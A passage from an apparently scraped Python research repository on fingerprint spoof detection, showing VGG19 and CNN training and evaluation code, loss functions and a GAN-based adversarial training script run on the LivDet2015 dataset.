APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n task_loss_eval = task_loss_eval / N\n transf_loss_eval = transf_loss_eval / N\n adv_loss_eval = adv_loss_eval / N\n CE_unif_loss_eval = CE_unif_loss_eval / N\n \n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) 
/ (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = float(\"inf\")\n \n return loss_eval, task_loss_eval, transf_loss_eval, adv_loss_eval, CE_unif_loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n #IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n CUDA = 0\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:\" + str(CUDA)) # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n \n #mode = input(\"Enter the mode [train/optim/test]: \")\n #data_ = input(\"Dataset [ALL/CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n\n mode = \"train\"\n data_=\"CrossMatch\"\n \n if mode != \"optim\":\n #unseen_ = input(\"Unseen attack? 
[y/n]: \")\n unseen_ = \"y\"\n else:\n unseen_ = \"y\"\n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n \n if data_ == \"ALL\":\n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n else:\n sensors = [data_]\n \n for DATASET in sensors:\n \n print(\"\\nRunning in \" + DATASET + \"...\\n\")\n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n optimization = [] \n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/VGG19bn_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n model = models.vgg19_bn(pretrained=True)\n set_parameter_requires_grad(model, feature_extracting=False)\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs,2)\n \n model = model.to(DEVICE)\n \n # Train or test\n if mode == 'train':\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn,\n unseen=unseen,\n n_fake=NUM_MATERIALS,\n unknown_material = test_material,\n adv_weight=ADV_WEIGHT_, \n transfer_weight=TRANSFER_WEIGHT_)\n \n # save train history\n train_res_fn = output_fn + \"cnn2_reg_fpad_history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n 
#Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_task_loss, test_transf_loss, test_adv_loss, test_ce_uniform_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE, n_fake = NUM_MATERIALS-1, adv_weight = ADV_WEIGHT_, transfer_weight = TRANSFER_WEIGHT_)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n print('Test task loss: {:.3f}'.format(test_task_loss))\n \n results.append((test_loss.item(), test_task_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results_reg.pckl'\n #pickle.dump(results, open(res_fn, \"wb\"))\n #results = pickle.load(open(res_fn, \"rb\"))\n \n elif mode == 'optim':\n \n \n best_accuracy = -1\n best_adv_weight = -1\n best_transfer_weight = -1\n \n 
step = 0\n \n for ADV_WEIGHT in ADV_WEIGHT_LIST:\n \n for TRANSFER_WEIGHT in TRANSFER_WEIGHT_LIST:\n \n #TRANSFER_WEIGHT = 0\n \n step = step + 1\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn,\n unseen=unseen,\n n_fake=NUM_MATERIALS,\n unknown_material = test_material,\n adv_weight=ADV_WEIGHT, \n transfer_weight=TRANSFER_WEIGHT,\n optimization = True,\n step = step)\n \n # save train history\n train_res_fn = output_fn + \"history_reg.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n history = [train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]]\n \n test_loss, test_task_loss, test_transf_loss, test_adv_loss, test_ce_uniform_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE, n_fake = NUM_MATERIALS-1, adv_weight=ADV_WEIGHT, transfer_weight=TRANSFER_WEIGHT)\n \n if test_acc > best_accuracy:\n best_accuracy = test_acc\n best_adv_weight = ADV_WEIGHT\n best_transfer_weight = TRANSFER_WEIGHT\n test_results = (test_loss.item(), test_task_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10)\n tr_results = history\n \n 
optimization.append((best_accuracy, best_adv_weight, best_transfer_weight))\n \n train_results_.append(tr_results)\n results.append(test_results)\n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n '''\n model.load_state_dict(torch.load(\n os.path.join(*(output_fn, 'mlp_fpad.pth'))))\n \n # load train history\n res_fn = os.path.join(*(output_fn, '_history.pckl'))\n train_history = pickle.load(open(res_fn, \"rb\"))\n plot_fn = os.path.join(*(output_fn, 'mlp_fpad_history.png'))\n plot_train_history(train_history, plot_fn=plot_fn)\n '''\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n ### PRINT RESULTS -----------------------------------------------------------------------------------------------------------------------------------\n print('\\n\\n\\n-------------------------------------------\\n-------------- R E S U L T S --------------\\n-------------------------------------------') \n \n print()\n print(\"***************\")\n print(DATASET)\n print(\"***************\")\n \n optim_res = []\n \n if optimization != []:\n \n print()\n for m in range(len(optimization)):\n print(\"\\n>> OPTIMIZATION RESULT MATERIAL {}:\\n\".format(m+1))\n print(\" - Best Accuracy = {}\".format(optimization[m][0]))\n print(\" - Best Adv Weight = {}\".format(optimization[m][1]))\n print(\" - Best Transfer Weight = {}\".format(optimization[m][2]))\n optim_res.append(optimization[m][0])\n optim_res.append(optimization[m][1])\n optim_res.append(optimization[m][2])\n print() \n \n optim_res = np.array(optim_res)\n np.savetxt(DATASET + '_optim.txt', optim_res, fmt='%.3f', delimiter=',')\n \n print('\\n-------------------------------------------') \n \n \n # Compute average and std\n task_loss_array = np.array([i[1] for i in results])\n acc_array = np.array([i[2] for i in results])\n apcer_array = np.array([i[3] for i in results])\n bpcer_array = np.array([i[4] for i in results])\n eer_array = np.array([i[5] for i in results])\n bpcer_apcer1_array = np.array([i[6] for i in 
results])\n bpcer_apcer5_array = np.array([i[7] for i in results])\n bpcer_apcer10_array = np.array([i[8] for i in results])\n apcer1_array = np.array([i[9] for i in results])\n apcer5_array = np.array([i[10] for i in results])\n apcer10_array = np.array([i[11] for i in results])\n \n \n if best_epochs != []:\n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n print()\n \n #Results of all loops (train and test)\n np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print(\"[Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n print(\">> TRAIN RESULTS:\")\n print()\n for k in range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print(\">> TEST RESULTS:\")\n print()\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt('results/' + DATASET + '_' + attack_txt + '_test_TASK.txt', results_test, fmt='%.3f', delimiter=',')\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6557231545448303, "alphanum_fraction": 0.6681455373764038, "avg_line_length": 27.174999237060547, "blob_id": "f3a9e27919d814ea99d4e1666ef630b05e1cb504", "content_id": "b069a94e6906deef5e5efbd6c2b440cc8d48d0e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1127, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/VGG/losses/losses_fpad.py", "repo_name": 
"joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.nn.functional import log_softmax\nimport itertools\n\ndef pairwise_loss(signers_combo_list, h_list):\n \"\"\"Computes pairwise signer-transfer loss\"\"\"\n loss = 0\n for s1, s2 in signers_combo_list:\n for l_s1, l_s2 in zip(h_list[s1], h_list[s2]):\n loss += torch.sum((l_s1 - l_s2)**2)\n return loss\n\n\ndef signer_transfer_loss(h_conv_split, signers_on_batch):\n \"\"\"Computes signer-transfer loss\"\"\"\n # generate pairwise signer combo list\n signers_combo_list = list(itertools.combinations(signers_on_batch, 2))\n\n # pairwise loss for conv and dense layers\n conv_loss = pairwise_loss(signers_combo_list, h_conv_split)\n #dense_loss = pairwise_loss(signers_combo_list, h_dense_split)\n\n loss = (conv_loss) * 1/len(signers_combo_list)\n\n return loss\n\n\ndef softCrossEntropyUniform(outputs):\n \n \n \"\"\"\n Args:\n outputs: output of the last layer before softmax, tensor of size (N, C)\n\n Outputs:\n loss: empirical cross-entropy between the uniform distribution and outputs,\n tensor of size (1,)\n \"\"\"\n\n return -log_softmax(outputs, dim=1).mean()\n" }, { "alpha_fraction": 0.5684884786605835, "alphanum_fraction": 0.5827365517616272, "avg_line_length": 34.074073791503906, "blob_id": "bd5d77a87c8970c25d44eb6d656223b614d436a9", "content_id": "f50c6d65db935833d72d419854bfc30f4d8d18ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13265, "license_type": "no_license", "max_line_length": 199, "num_lines": 378, "path": "/II-GAN/run.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport 
torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\n\nfrom utils import _nanargmin, normal_weights_init\nfrom evaluation import eval_model, test_model\nfrom data import get_data_loaders\nfrom gan import DISCRIMINATOR, GENERATOR\nfrom matcher import MATCHER\n\nBATCH_SIZE = 32\n\nIMG_SIZE = 128\n\nloss = nn.BCEWithLogitsLoss()\n\nsigmoid = nn.Sigmoid()\n\nLEARNING_RATE = 2e-4\n\n#-------------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# Training LooP\n\ndef fit(models, dataset, fake_material, data, num_epochs, matcher_epochs, device, with_generator = True, just_train_classifier = False):\n\n matcher_epochs = matcher_epochs + 1\n\n train_loader, valid_loader = data\n netD, netG = models \n\n if just_train_classifier == True:\n path = \"/ctm-hdd-pool01/afpstudents/jaf/LIVEGEN_\" + dataset + \"_material\" + str(fake_material) + \"_\" + str(500) + \"epochs_\"\n netG.load_state_dict(torch.load(path + 'Generator.pth'))\n\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/LIVEGEN_\" + dataset + \"_material\" + str(fake_material) + \"_\" + str(num_epochs) + \"epochs_\"\n output_path = f\"results/{DATASET}/{DATASET}_{TOA}_material{PAI}_{EPOCHS}epochs_\"\n\n # Start training\n train_history = {'train_c_loss': [], 'train_g_loss': [], 'train_acc': [], 'val_c_loss': [], 'val_g_loss': [], 'val_acc': []}\n \n netD.apply(normal_weights_init)\n\n if just_train_classifier == False:\n netG.apply(normal_weights_init)\n \n optimizerD = 
optim.Adam(netD.parameters(), lr=LEARNING_RATE)\n optimizerG = optim.Adam(netG.parameters(), lr=LEARNING_RATE)\n \n netD.train()\n netG.train()\n\n score_matcher = 0\n n_batches = 0\n \n for epoch in range(num_epochs):\n \n print(\"\\n\")\n \n g_loss = []\n d_loss = []\n\n d_real = []\n d_fake = []\n \n for i, (x,y) in enumerate(train_loader, 0):\n \n # (1) Update D network\n \n ## Train with all-real batch\n \n netD.zero_grad()\n netG.zero_grad()\n \n x = x.to(device)\n x_real = x[y == 0]\n x_fake = x[y == 1]\n\n \n\n if x_fake.shape[0] < 5:\n continue\n \n #b_size = real.size(0)\n \n output_real = netD(x_real)\n D_x = sigmoid(output_real.mean()).item()\n \n real_label = torch.zeros_like(output_real, device=device)\n \n errD_real = loss(output_real, real_label)\n\n ## Train with all-fake batch\n\n if with_generator:\n \n index = [i for i in range(x_fake.shape[0])]\n\n index_to_modify = random.sample(range(x_fake.shape[0]), x_fake.shape[0]//2)\n\n index_to_maintain = [i for i in index if i not in index_to_modify]\n\n x_fake_to_modify = x_fake[index_to_modify,...].clone().detach()\n\n x_fake_to_maintain = x_fake[index_to_maintain,...].clone().detach()\n\n x_fake_modified = netG(x_fake_to_modify)\n\n x_fake = torch.cat([x_fake_to_maintain, x_fake_modified], dim=0)\n\n if epoch >= num_epochs - matcher_epochs and just_train_classifier == False:\n\n try:\n m_score = MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n m_score = 10.0\n\n if epoch == num_epochs-1:\n try:\n score_matcher = score_matcher + MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n score_matcher = score_matcher + 10.0\n\n n_batches = n_batches + 1\n\n output_fake = netD(x_fake.detach())\n\n D_G_z = sigmoid(output_fake.mean()).item()\n \n fake_label = torch.ones_like(output_fake, device=device)\n \n errD_fake = loss(output_fake, fake_label)\n\n errD = errD_real + errD_fake\n\n errD.backward()\n optimizerD.step()\n \n # (2) Update G network\n\n if with_generator:\n \n netD.zero_grad()\n 
netG.zero_grad()\n \n output_fake = netD(x_fake)\n real_label = torch.zeros_like(output_fake, device=device)\n errG = loss(output_fake, real_label)\n\n if epoch >= num_epochs - matcher_epochs and just_train_classifier == False:\n errG = errG + m_score\n\n if just_train_classifier == False:\n errG.backward()\n optimizerG.step()\n \n #######################################################################\n #######################################################################\n \n sys.stdout.write(\"\\r\" + 'EPOCH [{}/{}] ..... {}-th batch: D_real = {:.3f} | D_fake = {:.3f}'.format(epoch+1, num_epochs, i+1, D_x, D_G_z))\n \n #Progress with fixed noise\n if with_generator and just_train_classifier == False:\n with torch.no_grad(): \n x_fake_modified = netG(x_fake_to_modify)\n save_images(x_fake_to_modify[:3], x_fake_modified[:3], dataset, fake_material, epoch)\n \n tr_c_loss, tr_g_loss, tr_acc = eval_model((netD, netG), train_loader, device, epoch, num_epochs, matcher_epochs, with_generator = with_generator)\n train_history['train_c_loss'].append(tr_c_loss.item())\n train_history['train_g_loss'].append(tr_g_loss.item())\n train_history['train_acc'].append(tr_acc)\n\n val_c_loss, val_g_loss, val_acc = eval_model((netD, netG), valid_loader, device, epoch, num_epochs, matcher_epochs, with_generator = with_generator)\n train_history['val_c_loss'].append(val_c_loss.item())\n train_history['val_g_loss'].append(val_g_loss.item())\n train_history['val_acc'].append(val_acc)\n\n # display the training loss\n print()\n print( '\\n>> Train: C_loss = {:.3f} |'.format(tr_c_loss.item()) + ' G_loss = {:.3f} |'.format(tr_g_loss.item()) + ' Acc = {:.3f}'.format(tr_acc) )\n print( '\\n>> Valid: C_loss = {:.3f} |'.format(val_c_loss.item()) + ' G_loss = {:.3f} |'.format(val_g_loss.item()) + ' Acc = {:.3f}'.format(val_acc) )\n print()\n\n if epoch == num_epochs-1 and with_generator and just_train_classifier == False:\n score_matcher = score_matcher / n_batches\n print('\\n>> Average 
matching score = {:.3f}'.format(score_matcher))\n\n # save train/valid history\n plot_fn = output_path + 'LIVEGEN_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n #load last model\n torch.save(netD.state_dict(), model_path + 'Discriminator.pth')\n if just_train_classifier == False:\n torch.save(netG.state_dict(), model_path + 'Generator.pth')\n \n return (netD, train_history)\n\n\ndef save_images(original_images, modified_images, dataset, fake_material, epoch):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.suptitle(\"Epoch {}\".format(epoch+1))\n ax1.axis(\"off\")\n ax2.axis(\"off\")\n ax1.imshow(np.transpose(vutils.make_grid(original_images, padding=2, normalize=True, nrow= 1).cpu(), (1,2,0)), vmin=-1, vmax=1)\n ax1.set_title(\"Original\")\n ax2.imshow(np.transpose(vutils.make_grid(modified_images, padding=2, normalize=True, nrow= 1).cpu(), (1,2,0)), vmin=-1, vmax=1)\n ax2.set_title(\"Modified\")\n fig.savefig('results/' + dataset + '/images_' + str(fake_material) + '/' + 'epoch_' + str(epoch+1) + '.png')\n\n\ndef plot_train_history(train_history, plot_fn):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_c_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_c_loss = train_history['val_c_loss'][best_val_epoch]\n best_val_g_loss = train_history['val_g_loss'][best_val_epoch]\n \n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_c_loss'])\n x = range(epochs)\n\n plt.subplot(311)\n plt.plot(x, train_history['train_c_loss'], 'r-')\n plt.plot(x, train_history['val_c_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_c_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val classifier loss')\n plt.legend(['train_clf_loss', 'val_clf_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_c_loss'])])\n\n plt.subplot(312)\n plt.plot(x, train_history['train_g_loss'], 'r-')\n plt.plot(x, train_history['val_g_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_g_loss, 'bx')\n 
plt.xlabel('Epoch')\n plt.ylabel('Train/Val generator loss')\n plt.legend(['train_gen_loss', 'val_gen_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_g_loss'])])\n\n plt.subplot(313)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n\n plt.savefig(plot_fn)\n plt.close() \n \nIMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n#IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n#IMG_PATH = \"/content/drive/My Drive/FPAD/Dataset/LivDet2015/train/\"\n\nEPOCHS = 250\nBATCH_SIZE = 32\nIMG_SIZE = 224\n\nprint()\nif torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"[Device] - GPU\")\nelse:\n DEVICE = torch.device(\"cpu\")\n print(\"[Device] - CPU\")\nprint()\n\n#DATASET = input(\"Dataset [CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n#DATASET = \"Digital_Persona\"\n\nUNSEEN_ATTACK = True\nUSE_GENERATOR = True\nEPOCHS_WITH_MATCHER = 125\n\nif USE_GENERATOR:\n TG = \"wGen\"\nelse:\n TG = \"noGen\"\n\nif UNSEEN_ATTACK:\n TOA = \"UA\"\nelse:\n TOA = \"OA\"\n\n# [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"]\n\nfor DATASET in [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"]:\n\n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n TEST_MATERIALS = [0, 1, 2]\n else:\n NUM_MATERIALS = 4\n TEST_MATERIALS = [0, 1, 2, 3]\n\n results = []\n\n for PAI in TEST_MATERIALS:\n\n netD = DISCRIMINATOR().to(DEVICE)\n netG = GENERATOR().to(DEVICE)\n\n print(\"[Dataset] - \" + DATASET + \" -> Material number \" + str(PAI))\n \n train_loader, valid_loader, test_loader = get_data_loaders(IMG_PATH, DATASET, test_material = PAI, img_size = IMG_SIZE, batch_size = BATCH_SIZE, 
croped=True, unseen_attack=UNSEEN_ATTACK)\n\n #netD, train_history = fit((netD, netG), DATASET, PAI, (train_loader, valid_loader), EPOCHS, EPOCHS_WITH_MATCHER, DEVICE, with_generator = USE_GENERATOR)\n\n netD, train_history = fit((netD, netG), DATASET, PAI, (train_loader, valid_loader), EPOCHS, EPOCHS_WITH_MATCHER, DEVICE, with_generator = USE_GENERATOR, just_train_classifier = True)\n\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = test_model(netD, test_loader, DEVICE)\n\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n\n #PRINTS -------------------------------------------------------------------------------------\n\n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n\n print()\n print(\">> TEST RESULTS [Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]:\")\n print()\n\n results_test = []\n\n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n 
results_test.append(res)\n\n np.savetxt(DATASET + '_' + TOA + '_' + TG + '_' + str(EPOCHS) + 'epochs_test.txt', results_test, fmt='%.3f', delimiter=',') " }, { "alpha_fraction": 0.47323521971702576, "alphanum_fraction": 0.4890168607234955, "avg_line_length": 26.421052932739258, "blob_id": "4520f4a2837d8517adcefd7707e58e9993118104", "content_id": "f1cf6ed49bd413ec6676db688e18cddba056191e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 71, "num_lines": 171, "path": "/CNNreg/models/cnn2.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom cnn2_layers import BasicConvLayer, BasicDenseLayer\n\n\nN_CLASSES = 2 \nCHANNELS = 1 \n\nCONV_FILTERS = [64, 64, 128, 128, 256, 256, 256, 256]\n\nN_CONV = len(CONV_FILTERS)\n\n\nMAX_POOL = [False, True, False, True, False, False, False, True]\n\nK_SIZES = [3]*N_CONV\n\nSTRIDES = [1]*N_CONV\n\nPADDINGS = [1]*N_CONV\n\nFC_DIMS = [4096, 4096, 1000, 2]\n\nDROPOUT = .5\nBATCH_NORM = True\n\nN_CONV = len(CONV_FILTERS)\nN_FC = len(FC_DIMS)\n\nclass CNN2_FPAD(nn.Module):\n def __init__(self,\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_only_classifier=False):\n\n super(CNN2_FPAD, self).__init__()\n\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n\n self.is_only_classifier = is_only_classifier\n\n if self.is_only_classifier:\n # Initialize fc layers\n self.create_dense_layers()\n else:\n # Initialize conv layers\n self.create_conv_layers()\n \n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n \n # 
Initialize fc layers\n self.create_dense_layers()\n\n\n def create_conv_layers(self):\n # first conv layer\n conv_list = nn.ModuleList([\n BasicConvLayer(in_channels=CHANNELS,\n out_channels=CONV_FILTERS[0],\n kernel_size=K_SIZES[0],\n stride=STRIDES[0],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[0])\n ])\n\n # remaining conv layers\n conv_list.extend([BasicConvLayer(in_channels=CONV_FILTERS[l-1],\n out_channels=CONV_FILTERS[l],\n kernel_size=K_SIZES[l],\n stride=STRIDES[l],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[l])\n for l in range(1, N_CONV)])\n\n\n self.convolutions = nn.Sequential(*conv_list)\n\n def create_dense_layers(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=FC_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=FC_DIMS[l-1],\n out_features=FC_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last dense layer\n dense_list.append(BasicDenseLayer(in_features=FC_DIMS[-2],\n out_features=FC_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.classifier = nn.Sequential(*dense_list)\n\n def forward(self, x):\n # get the activations of each layer\n conv_list = ()\n for layer in range(N_CONV):\n x = self.convolutions[layer](x)\n conv_list += x,\n \n x = conv_list[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = 